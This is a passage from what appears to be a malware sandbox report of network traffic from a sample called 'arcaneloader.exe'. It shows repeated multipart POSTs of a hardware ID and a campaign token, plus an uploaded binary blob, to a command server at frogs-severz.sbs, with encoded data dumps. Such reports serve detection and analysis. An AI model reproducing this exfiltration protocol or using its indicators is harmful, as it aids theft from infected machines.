                                                                        Data Ascii: 4davVw7Pzt7Yqzs6ymN49WrT6+WwIAp9YtJvh48E723ijnGfk0dAU9Ojp+OC7eXp94qg7Sh5AvP7SjSbVk/n8HnG4c6WlNIHk6OiZMLt7iuiSrBtPqiTJ/pKNJ8XXjSx+Za1TBcV14YBs2AhkzohrTBIcb7qO0L2aksxDwGMfDS/ljwPUhUGQZO186OR6/Z98oqzfqm5EKd4yHafVh5zd7sUdU+X1ZUERLAioFH7oy0iWON87qiE9e6Gd9tT2
                                                                        2024-11-23 14:03:07 UTC893INData Raw: 63 68 6f 4a 41 36 70 4f 38 77 43 44 41 39 4b 2f 6f 52 4a 54 70 4c 4e 5a 32 55 58 76 62 32 4f 56 64 33 7a 34 5a 45 78 6b 65 47 49 37 57 79 57 6a 71 6b 62 44 46 4f 34 2f 4f 34 76 30 46 6a 71 6b 73 30 44 77 47 4d 64 66 51 36 31 6a 55 4d 56 70 56 55 67 73 41 33 49 69 45 54 76 32 48 73 73 63 6e 7a 75 61 6f 37 45 32 55 34 43 44 56 65 56 6c 31 6e 35 75 6f 58 4d 64 2b 41 52 31 34 46 41 76 43 68 4a 35 4c 72 35 37 35 30 47 33 4b 2b 4f 4b 36 43 35 50 6f 4c 39 31 34 55 48 2f 62 32 65 35 56 30 6a 46 66 56 31 6b 65 43 73 61 47 69 45 62 6b 6a 72 66 4d 49 4d 6e 79 72 75 4e 4f 31 36 64 72 32 32 51 65 4b 5a 2f 37 37 31 6a 4e 66 47 78 65 56 78 63 48 32 4d 36 57 42 66 62 42 73 4d 56 74 6c 62 53 73 35 30 53 46 36 44 6e 5a 63 6b 78 39 32 74 50 6c 57 4e 45 2b 58 46 70 55 46 77
                                                                        Data Ascii: choJA6pO8wCDA9K/oRJTpLNZ2UXvb2OVd3z4ZExkeGI7WyWjqkbDFO4/O4v0Fjqks0DwGMdfQ61jUMVpVUgsA3IiETv2Hsscnzuao7E2U4CDVeVl1n5uoXMd+AR14FAvChJ5Lr5750G3K+OK6C5PoL914UH/b2e5V0jFfV1keCsaGiEbkjrfMIMnyruNO16dr22QeKZ/771jNfGxeVxcH2M6WBfbBsMVtlbSs50SF6DnZckx92tPlWNE+XFpUFw
                                                                        2024-11-23 14:03:07 UTC1369INData Raw: 33 66 39 32 0d 0a 6c 64 46 41 2f 48 68 34 42 5a 35 59 32 35 32 79 44 48 38 61 7a 75 54 70 6a 70 4b 74 31 79 56 48 71 66 6d 36 68 63 78 33 34 42 48 58 59 55 45 4e 79 45 67 6c 71 74 74 4c 54 48 49 38 72 69 34 76 30 46 6a 71 6b 73 30 44 77 47 4d 64 54 54 35 46 66 66 4f 45 74 54 56 67 73 4b 33 49 71 48 54 2b 4f 50 76 73 51 69 79 4f 61 6d 34 6c 6d 57 37 43 7a 53 63 55 78 30 6e 35 75 6f 58 4d 64 2b 41 52 31 6a 4c 51 66 65 6e 34 34 4a 32 6f 4b 35 78 79 72 62 74 4c 32 73 55 74 66 75 4a 35 77 6b 48 6e 4c 54 32 4f 46 65 30 43 78 54 55 56 67 4c 42 38 65 48 67 30 72 68 6a 72 7a 46 4b 4e 2f 2f 72 65 70 45 6c 75 51 6d 31 33 68 65 4d 5a 47 56 37 30 4f 66 5a 68 6c 38 56 42 59 53 7a 5a 2f 4c 66 75 79 50 75 63 34 37 6a 65 76 73 2b 77 75 51 35 57 75 45 50 46 39 39 30 39 54
                                                                        Data Ascii: 3f92ldFA/Hh4BZ5Y252yDH8azuTpjpKt1yVHqfm6hcx34BHXYUENyEglqttLTHI8ri4v0Fjqks0DwGMdTT5FffOEtTVgsK3IqHT+OPvsQiyOam4lmW7CzScUx0n5uoXMd+AR1jLQfen44J2oK5xyrbtL2sUtfuJ5wkHnLT2OFe0CxTUVgLB8eHg0rhjrzFKN//repEluQm13heMZGV70OfZhl8VBYSzZ/LfuyPuc47jevs+wuQ5WuEPF9909T
                                                                        2024-11-23 14:03:07 UTC1369INData Raw: 56 35 57 55 68 30 45 7a 6f 4f 43 52 65 47 49 75 38 45 68 79 75 61 76 35 30 4f 64 34 43 37 51 63 56 31 6a 33 4e 53 6f 46 5a 38 35 51 52 30 42 57 53 66 39 75 61 6f 4c 38 4d 2b 75 69 53 72 42 74 50 71 69 53 70 2f 75 4a 64 68 75 55 47 50 52 30 75 68 64 31 7a 5a 65 55 56 63 58 45 73 61 50 69 55 58 67 69 62 37 4e 4c 4d 6e 77 72 75 55 4c 32 61 6b 73 78 44 77 47 4d 66 66 57 38 6b 47 64 45 46 4a 64 58 67 6b 57 31 63 36 57 42 66 62 42 73 4d 56 74 6c 62 53 6d 36 55 47 65 36 69 4c 59 63 56 35 34 30 4e 7a 67 56 74 63 73 57 46 64 4c 48 51 58 50 67 59 4e 50 35 34 32 34 78 53 6e 66 2f 2b 4b 73 43 35 44 78 61 34 51 38 66 6e 72 4a 39 76 70 4a 6e 79 45 58 52 42 6b 65 44 49 37 57 79 55 4c 6a 67 4c 62 44 4b 38 62 78 72 2b 4a 4f 6e 65 34 6e 33 48 78 64 64 39 6e 59 34 46 50 54
                                                                        Data Ascii: V5WUh0EzoOCReGIu8Ehyuav50Od4C7QcV1j3NSoFZ85QR0BWSf9uaoL8M+uiSrBtPqiSp/uJdhuUGPR0uhd1zZeUVcXEsaPiUXgib7NLMnwruUL2aksxDwGMffW8kGdEFJdXgkW1c6WBfbBsMVtlbSm6UGe6iLYcV540NzgVtcsWFdLHQXPgYNP5424xSnf/+KsC5Dxa4Q8fnrJ9vpJnyEXRBkeDI7WyULjgLbDK8bxr+JOne4n3Hxdd9nY4FPT
                                                                        2024-11-23 14:03:07 UTC1369INData Raw: 59 63 43 4d 57 49 68 30 72 70 6a 62 71 4a 59 34 33 7a 75 71 49 54 31 38 34 78 30 58 70 4a 59 4f 72 53 36 41 71 66 49 52 64 45 47 52 34 4d 6a 74 62 4a 52 75 4f 4c 75 73 77 70 78 66 4f 68 34 30 65 54 35 43 62 59 64 56 70 30 7a 63 66 75 56 64 38 78 56 31 4a 56 43 77 37 4c 6a 6f 55 4c 6f 63 47 77 30 57 32 56 74 4a 50 31 53 39 66 32 5a 63 55 38 57 58 32 66 6a 61 68 55 30 69 78 56 55 6c 6b 59 41 38 71 46 6a 6b 33 70 67 4c 54 4d 4c 73 6a 79 6f 2b 4a 48 6e 65 34 6a 31 6e 4a 54 64 39 76 54 37 68 75 52 66 6c 35 46 47 55 46 41 2f 49 4f 48 51 75 79 48 75 74 38 46 2f 4c 53 39 72 46 4c 58 37 69 65 63 4a 42 35 31 31 4e 33 6b 58 74 63 37 57 46 56 54 45 51 2f 42 6e 49 68 45 35 6f 61 38 78 43 4c 44 38 61 7a 77 54 4a 7a 69 49 39 56 79 57 44 47 52 6c 65 39 44 6e 32 59 5a 61
                                                                        Data Ascii: YcCMWIh0rpjbqJY43zuqIT184x0XpJYOrS6AqfIRdEGR4MjtbJRuOLuswpxfOh40eT5CbYdVp0zcfuVd8xV1JVCw7LjoULocGw0W2VtJP1S9f2ZcU8WX2fjahU0ixVUlkYA8qFjk3pgLTMLsjyo+JHne4j1nJTd9vT7huRfl5FGUFA/IOHQuyHut8F/LS9rFLX7iecJB511N3kXtc7WFVTEQ/BnIhE5oa8xCLD8azwTJziI9VyWDGRle9Dn2YZa
                                                                        2024-11-23 14:03:07 UTC1369INData Raw: 4a 68 6f 31 46 2f 59 43 34 69 57 4f 4e 38 37 71 69 45 39 66 59 50 64 74 37 55 54 50 32 30 76 4e 61 31 54 31 53 55 52 6b 47 54 74 66 4f 6a 6b 65 76 32 66 66 45 49 63 44 77 73 4f 35 4c 6c 2b 41 73 31 6d 35 52 66 74 4c 57 36 46 37 4e 50 30 74 53 55 68 77 44 79 6f 47 47 52 2b 65 4c 39 34 64 74 79 75 7a 69 75 67 75 37 36 6a 72 57 50 6e 6c 72 79 64 4c 6b 53 74 51 7a 56 52 31 47 56 78 6d 4f 69 59 55 4c 74 38 47 33 79 43 44 66 38 61 50 6f 51 5a 72 68 4a 4e 6c 35 55 58 58 62 33 75 5a 4a 30 54 46 5a 57 31 49 59 42 63 32 46 67 30 58 6d 6b 2f 65 48 62 63 72 73 34 72 6f 4c 76 66 49 71 30 58 41 63 58 39 54 44 37 78 6e 2b 4d 46 4a 61 56 51 39 41 30 63 43 51 43 2b 69 4e 39 35 46 74 78 50 71 75 34 55 79 66 34 53 37 63 64 31 35 2b 31 64 76 76 53 64 55 79 55 30 39 57 47 67
                                                                        Data Ascii: Jho1F/YC4iWON87qiE9fYPdt7UTP20vNa1T1SURkGTtfOjkev2ffEIcDwsO5Ll+As1m5RftLW6F7NP0tSUhwDyoGGR+eL94dtyuziugu76jrWPnlrydLkStQzVR1GVxmOiYULt8G3yCDf8aPoQZrhJNl5UXXb3uZJ0TFZW1IYBc2Fg0Xmk/eHbcrs4roLvfIq0XAcX9TD7xn+MFJaVQ9A0cCQC+iN95FtxPqu4Uyf4S7cd15+1dvvSdUyU09WGg
                                                                        2024-11-23 14:03:07 UTC1369INData Raw: 42 66 62 42 73 4d 56 74 6c 62 53 69 35 6b 65 55 37 69 58 54 63 56 46 32 31 4e 72 69 56 63 30 78 58 46 56 56 45 51 33 63 68 49 4e 5a 35 6f 69 36 78 79 58 66 39 2b 4b 73 43 35 44 78 61 34 51 38 62 48 76 63 32 66 35 57 30 48 35 47 45 30 42 5a 42 38 4c 4f 30 51 76 39 6b 37 66 43 4c 63 72 36 73 4f 4e 44 6d 4f 4d 72 32 6e 64 55 63 74 62 52 35 6c 4c 5a 50 31 52 63 57 42 6b 46 7a 6f 65 62 52 71 2f 50 39 38 34 31 6a 61 7a 69 31 55 65 63 32 43 6a 4b 50 45 45 2f 78 70 58 76 56 35 39 6d 47 56 78 4c 46 41 6a 4b 6a 6f 52 4e 35 49 43 32 79 69 33 4e 39 36 4c 6e 51 4a 6a 76 4c 4e 46 32 56 33 6a 4e 33 65 78 4a 33 7a 4a 64 48 52 64 5a 42 39 62 4f 30 51 76 66 67 72 7a 46 4c 63 44 68 34 76 30 46 6a 71 6b 73 30 44 77 47 4d 64 66 65 34 31 33 55 50 56 70 54 55 68 4d 50 77 59 53
                                                                        Data Ascii: BfbBsMVtlbSi5keU7iXTcVF21NriVc0xXFVVEQ3chINZ5oi6xyXf9+KsC5Dxa4Q8bHvc2f5W0H5GE0BZB8LO0Qv9k7fCLcr6sONDmOMr2ndUctbR5lLZP1RcWBkFzoebRq/P9841jazi1Uec2CjKPEE/xpXvV59mGVxLFAjKjoRN5IC2yi3N96LnQJjvLNF2V3jN3exJ3zJdHRdZB9bO0QvfgrzFLcDh4v0Fjqks0DwGMdfe413UPVpTUhMPwYS
                                                                        2024-11-23 14:03:07 UTC1369INData Raw: 37 62 45 4a 73 47 32 6f 2b 39 62 6b 4b 6c 6c 6e 48 6f 65 4b 59 2b 62 71 46 2f 4f 66 67 45 4e 43 30 4a 56 6e 64 6e 5a 47 66 44 50 72 6f 6b 37 6a 61 7a 77 72 41 75 46 71 58 4f 63 4f 31 31 6a 7a 64 50 72 54 64 78 35 5a 32 4e 35 45 67 7a 4e 67 6f 68 4d 72 38 2f 33 78 6d 32 56 7a 65 4c 68 57 59 57 6d 4f 73 70 78 54 6e 61 54 33 66 6c 57 30 33 34 58 48 52 55 64 43 38 4b 4c 6a 6c 75 67 6b 36 66 43 49 64 75 34 70 76 41 4c 32 61 6b 36 31 33 4e 4d 66 39 69 61 2b 55 33 53 4c 6c 70 59 58 6c 55 49 33 34 4f 46 43 36 48 42 6f 73 49 68 79 2f 6d 33 72 56 71 42 36 6a 33 62 4d 46 5a 67 30 74 6d 6f 5a 4a 46 2b 51 52 30 42 57 54 58 4e 67 49 64 4d 2b 5a 44 36 36 53 62 42 39 36 37 6a 54 4e 65 6e 61 39 6f 38 42 69 4b 52 6c 65 78 4b 6e 32 59 4a 44 77 4a 4d 55 35 6e 65 32 31 53 68
                                                                        Data Ascii: 7bEJsG2o+9bkKllnHoeKY+bqF/OfgENC0JVndnZGfDProk7jazwrAuFqXOcO11jzdPrTdx5Z2N5EgzNgohMr8/3xm2VzeLhWYWmOspxTnaT3flW034XHRUdC8KLjlugk6fCIdu4pvAL2ak613NMf9ia+U3SLlpYXlUI34OFC6HBosIhy/m3rVqB6j3bMFZg0tmoZJF+QR0BWTXNgIdM+ZD66SbB967jTNena9o8BiKRlexKn2YJDwJMU5ne21Sh
                                                                        2024-11-23 14:03:07 UTC1369INData Raw: 75 4e 72 50 47 73 43 34 57 70 63 35 77 37 55 48 7a 65 31 75 5a 59 7a 53 78 66 58 6b 38 61 52 2f 43 77 72 45 62 69 68 4c 6e 4f 45 2f 50 56 71 50 4a 47 6d 4f 34 56 34 6b 74 50 64 73 2b 58 7a 6c 6a 4a 50 52 6b 54 47 51 46 41 6c 73 36 6f 51 66 2b 4d 75 4d 35 74 67 37 53 6d 6f 68 50 58 7a 43 62 52 65 56 42 32 6e 66 54 69 53 39 49 78 58 68 30 58 57 51 79 4f 31 73 6c 4b 35 5a 47 36 78 69 71 42 38 37 6a 6c 43 39 6d 70 4a 5a 77 6b 48 6e 44 56 78 65 56 55 32 48 4a 66 55 31 64 5a 48 34 43 58 79 56 32 76 32 65 53 48 62 64 2b 30 2b 71 49 4d 6d 65 51 71 33 33 4a 64 59 38 33 54 36 30 33 63 65 57 64 6a 66 42 51 4e 79 34 43 4f 64 64 47 67 76 64 6b 67 77 76 50 67 77 6b 79 42 36 68 58 69 53 30 39 32 7a 35 66 4f 57 4d 6b 39 47 52 4d 5a 41 55 43 57 7a 71 68 42 2f 34 79 34 7a
                                                                        Data Ascii: uNrPGsC4Wpc5w7UHze1uZYzSxfXk8aR/CwrEbihLnOE/PVqPJGmO4V4ktPds+XzljJPRkTGQFAls6oQf+MuM5tg7SmohPXzCbReVB2nfTiS9IxXh0XWQyO1slK5ZG6xiqB87jlC9mpJZwkHnDVxeVU2HJfU1dZH4CXyV2v2eSHbd+0+qIMmeQq33JdY83T603ceWdjfBQNy4COddGgvdkgwvPgwkyB6hXiS092z5fOWMk9GRMZAUCWzqhB/4y4z


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.649711172.67.155.47443280C:\Users\user\Desktop\arcaneloader.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-23 14:03:09 UTC283OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=56D4XXNYZO2MRVK5P5F
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 12872
                                                                        Host: frogs-severz.sbs
                                                                        2024-11-23 14:03:09 UTC12872OUTData Raw: 2d 2d 35 36 44 34 58 58 4e 59 5a 4f 32 4d 52 56 4b 35 50 35 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 31 44 41 45 41 44 33 42 38 39 36 46 36 37 42 44 38 44 43 46 43 30 42 43 46 46 30 32 43 45 34 0d 0a 2d 2d 35 36 44 34 58 58 4e 59 5a 4f 32 4d 52 56 4b 35 50 35 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 35 36 44 34 58 58 4e 59 5a 4f 32 4d 52 56 4b 35 50 35 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 70 79
                                                                        Data Ascii: --56D4XXNYZO2MRVK5P5FContent-Disposition: form-data; name="hwid"D1DAEAD3B896F67BD8DCFC0BCFF02CE4--56D4XXNYZO2MRVK5P5FContent-Disposition: form-data; name="pid"2--56D4XXNYZO2MRVK5P5FContent-Disposition: form-data; name="lid"LPnhqo--py
                                                                        2024-11-23 14:03:10 UTC1011INHTTP/1.1 200 OK
                                                                        Date: Sat, 23 Nov 2024 14:03:09 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=o28skbt52ffoibdituhnjv8sr4; expires=Wed, 19-Mar-2025 07:49:48 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        cf-cache-status: DYNAMIC
                                                                        vary: accept-encoding
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BTAoHyPPRI03KK5Vno8jz3poj%2FiXin0qunD1nRKQPNsbcCc7tjkGxoQP%2BInLoXTmNtrHR%2BhR2W1zW0lIv367gQnaVeDYS8i3rhC5FkDtOo1ZYZGikLmu5gWd7wYVoSXdmhKT"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e71b37809c18cda-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1899&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2838&recv_bytes=13813&delivery_rate=1477732&cwnd=239&unsent_bytes=0&cid=9bdc397fcf3e2b19&ts=766&x=0"
                                                                        2024-11-23 14:03:10 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                        Data Ascii: eok 8.46.123.75
                                                                        2024-11-23 14:03:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.649712172.67.155.47443280C:\Users\user\Desktop\arcaneloader.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-23 14:03:11 UTC274OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=XXQ7AGRVIG
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 15064
                                                                        Host: frogs-severz.sbs
                                                                        2024-11-23 14:03:11 UTC15064OUTData Raw: 2d 2d 58 58 51 37 41 47 52 56 49 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 31 44 41 45 41 44 33 42 38 39 36 46 36 37 42 44 38 44 43 46 43 30 42 43 46 46 30 32 43 45 34 0d 0a 2d 2d 58 58 51 37 41 47 52 56 49 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 58 58 51 37 41 47 52 56 49 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 70 79 6f 6b 6f 6e 65 77 78 64 78 78 0d 0a 2d 2d 58 58 51 37 41 47 52 56 49 47 0d 0a 43
                                                                        Data Ascii: --XXQ7AGRVIGContent-Disposition: form-data; name="hwid"D1DAEAD3B896F67BD8DCFC0BCFF02CE4--XXQ7AGRVIGContent-Disposition: form-data; name="pid"2--XXQ7AGRVIGContent-Disposition: form-data; name="lid"LPnhqo--pyokonewxdxx--XXQ7AGRVIGC
                                                                        2024-11-23 14:03:12 UTC1019INHTTP/1.1 200 OK
                                                                        Date: Sat, 23 Nov 2024 14:03:12 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=nakdql7r7fnbjs15l77gsvafos; expires=Wed, 19-Mar-2025 07:49:50 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        cf-cache-status: DYNAMIC
                                                                        vary: accept-encoding
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IakuDFSIBhwoJ46YmdOTHI5QO3vIx2lReQtzPtlEuffp5hpVppKUjg82ynWZJM3iVD%2FuxIg%2BZVVrd%2BD8KKQ13Ut3GX8OVTw%2BZr%2BE6cySs3IQSw6FU%2B7%2FelCiILP2SuqC9oZQ"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e71b3863b5a431c-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1686&sent=14&recv=23&lost=0&retrans=0&sent_bytes=2840&recv_bytes=15996&delivery_rate=1664766&cwnd=231&unsent_bytes=0&cid=b788119a2dc9fa96&ts=659&x=0"
                                                                        2024-11-23 14:03:12 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                        Data Ascii: eok 8.46.123.75
                                                                        2024-11-23 14:03:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.2.649718172.67.155.47443280C:\Users\user\Desktop\arcaneloader.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-23 14:03:13 UTC282OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=6AAEYK46R6IOQ9S7O3
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 19970
                                                                        Host: frogs-severz.sbs
                                                                        2024-11-23 14:03:13 UTC15331OUTData Raw: 2d 2d 36 41 41 45 59 4b 34 36 52 36 49 4f 51 39 53 37 4f 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 31 44 41 45 41 44 33 42 38 39 36 46 36 37 42 44 38 44 43 46 43 30 42 43 46 46 30 32 43 45 34 0d 0a 2d 2d 36 41 41 45 59 4b 34 36 52 36 49 4f 51 39 53 37 4f 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 36 41 41 45 59 4b 34 36 52 36 49 4f 51 39 53 37 4f 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 70 79 6f 6b 6f
                                                                        Data Ascii: --6AAEYK46R6IOQ9S7O3Content-Disposition: form-data; name="hwid"D1DAEAD3B896F67BD8DCFC0BCFF02CE4--6AAEYK46R6IOQ9S7O3Content-Disposition: form-data; name="pid"3--6AAEYK46R6IOQ9S7O3Content-Disposition: form-data; name="lid"LPnhqo--pyoko
                                                                        2024-11-23 14:03:13 UTC4639OUTData Raw: bb 32 f0 03 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b
                                                                        Data Ascii: 2+?2+?2+?o?Mp5
                                                                        2024-11-23 14:03:14 UTC1005INHTTP/1.1 200 OK
                                                                        Date: Sat, 23 Nov 2024 14:03:14 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=gs5rhbo3jl5g33hnght9jqju8t; expires=Wed, 19-Mar-2025 07:49:53 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        cf-cache-status: DYNAMIC
                                                                        vary: accept-encoding
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=117XeTaDSEaCc4DGYeZm5CnYpWsE5pXRD12PHZnNWNsuRTxSH8qUsy3AX5IdwMVsGsPzmR798oFOvwOC9QYWrLkJovrmgxxm77uLqdjX6UPBlnXLCm3coX1kF0KIquOYIyqy"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e71b3935f1a42a3-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1750&sent=13&recv=22&lost=0&retrans=0&sent_bytes=2840&recv_bytes=20932&delivery_rate=1642294&cwnd=154&unsent_bytes=0&cid=42c4f6ac29a54fe4&ts=831&x=0"
                                                                        2024-11-23 14:03:14 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                        Data Ascii: eok 8.46.123.75
                                                                        2024-11-23 14:03:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        5192.168.2.649724172.67.155.47443280C:\Users\user\Desktop\arcaneloader.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-23 14:03:16 UTC280OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=PD2T8EIINYSKEORWQ
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 1221
                                                                        Host: frogs-severz.sbs
                                                                        2024-11-23 14:03:16 UTC1221OUTData Raw: 2d 2d 50 44 32 54 38 45 49 49 4e 59 53 4b 45 4f 52 57 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 31 44 41 45 41 44 33 42 38 39 36 46 36 37 42 44 38 44 43 46 43 30 42 43 46 46 30 32 43 45 34 0d 0a 2d 2d 50 44 32 54 38 45 49 49 4e 59 53 4b 45 4f 52 57 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 50 44 32 54 38 45 49 49 4e 59 53 4b 45 4f 52 57 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 70 79 6f 6b 6f 6e 65 77
                                                                        Data Ascii: --PD2T8EIINYSKEORWQContent-Disposition: form-data; name="hwid"D1DAEAD3B896F67BD8DCFC0BCFF02CE4--PD2T8EIINYSKEORWQContent-Disposition: form-data; name="pid"1--PD2T8EIINYSKEORWQContent-Disposition: form-data; name="lid"LPnhqo--pyokonew
                                                                        2024-11-23 14:03:16 UTC1008INHTTP/1.1 200 OK
                                                                        Date: Sat, 23 Nov 2024 14:03:16 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
